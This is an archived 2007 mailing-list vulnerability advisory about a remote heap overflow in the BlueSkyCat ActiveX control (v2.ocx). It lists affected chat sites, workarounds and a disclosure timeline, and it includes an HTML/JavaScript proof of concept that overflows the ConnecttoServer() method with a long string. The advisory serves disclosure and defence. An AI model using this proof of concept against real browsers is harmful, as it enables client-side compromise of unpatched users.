Hosting Provided By

CAL-20070730-1 BlueSkyCat ActiveX Remote Heap Overflow vulnerability

From: Code Audit Labs <vulnhunt(at)gmail.com>
Date: Mon Jul 30 2007 - 20:36:11 EDT

BACKGROUND:

BlueSkychat is a professional voice and video chat software widely used by large chat websites in china.

DESCRIPTION:

Code Audit Labs Code Audit for BlueSkyCat ActiveX Control and discovered a vulnerability .

Remote exploitation of a buffer overflow in an ActiveX control distributed
with Bluesky.cn could allow for the execution of arbitrary code.

When Blueskychat are installed, they register the following ActiveX control on the system:

Do you need help?

ProgId: V2.V2Ctrl.1
ClassId: 2EA6D939-4445-43F1-A12B-8CB3DDA8B855 File: v2.ocx

This control contains a buffer overflow in its ConnecttoServer() method.

This is a clent side vulnerability. So the clients of following chat servers which install the affected BlueSkyCat software are affected.

bliao	      
http://www.bliao.com
qqliao	      
http://www.qqliao.com
7liao	      
http://www.7liao.com
haoliao	      
http://www.haoliao.net
51liao	      
http://chat.51liao.net
heshang	      
http://www.heshang.net
xicn	      
http://vchat.xicn.net
CN104	      
http://www.cn104.com
liao-tian     
http://www.liao-tian.com
aliao	      
http://www.aliao.net
kuailiao      
http://www.kuailiao.com
mtliao	      
http://www.mtliao.com
pj0427	      
http://www.pj0427.com
uighur	      
http://chat.uighur.cn
wmliao	      
http://www.wmliao.com

CVE:

We request a CVE number to assign to this vulnerability.

Affected version:

v2.ocx version 8.1.2.0 and prior

vendor:

BlueSky http://www.bluesky.cn/

POC:

<html>
<head>
<OBJECT ID="com" CLASSID="CLSID:{2EA6D939-4445-43F1-A12B-8CB3DDA8B855}">
</OBJECT>
</head>
<body>
<SCRIPT language="javascript">

function ClickForRunCalc()
{

Do you need more help?

var heapSprayToAddress = 0x0d0d0d0d;

     var payLoadCode = "A" ;
     while (payLoadCode.length <= 10000) payLoadCode+='A';
     com.ConnecttoServer("1",payLoadCode,"3","4","5");

}
</script>
<button onclick="javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>

Code Audit Labs Suggestion

for vendor:

Do a full coverage Code Audit or Code Review

for client:
The following workarounds are available for this vulnerability:

Disable Active Scripting
Unregister the vulnerable control
Set the killbit for the vulnerable control
or update the software from http://www.bluesky.cn

DISCLOSURE TIMELINE:

2007-07-29 notice vendor (mail to blueskychat@gmail.com)
2007-07-29 the vendor reply "thank,had fixed it".
2007-07-30 we check it out, in fact,the websites which install the software did not almost all be updated,send mail to vendor again.
2007-07-31 release this report

About Us:

Code Audit Labs secure your software,provide Professional include source code audit and binary code audit service. Code Audit Labs:" You create value for customer,We protect your value" http://www.VulnHunt.com

Original LINK:

1:
http://www.vulnhunt.com/advisories/CAL-20070730-1_BlueSkyCat_v2.ocx_ActiveX_remote_heap_overflow_vulnerability_en.txt 2: http://CodeAudit.blogspot.com

Can we help you?

EOF

-- 
Code Audit Labs
http://www.vulnhunt.com/

Received on Tue Jul 31 12:17:45 2007

This message: [ Message body ]
Next message: 3APA3A: "Re: [BuHa-Security] Winamp 5.35 (Infinite) M3U File Inclusion DoS Vulnerability"
Previous message: no-reply(at)aria-security.net: "Re: RFI ====> vBulletin v3.6.5"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:10:35 EDT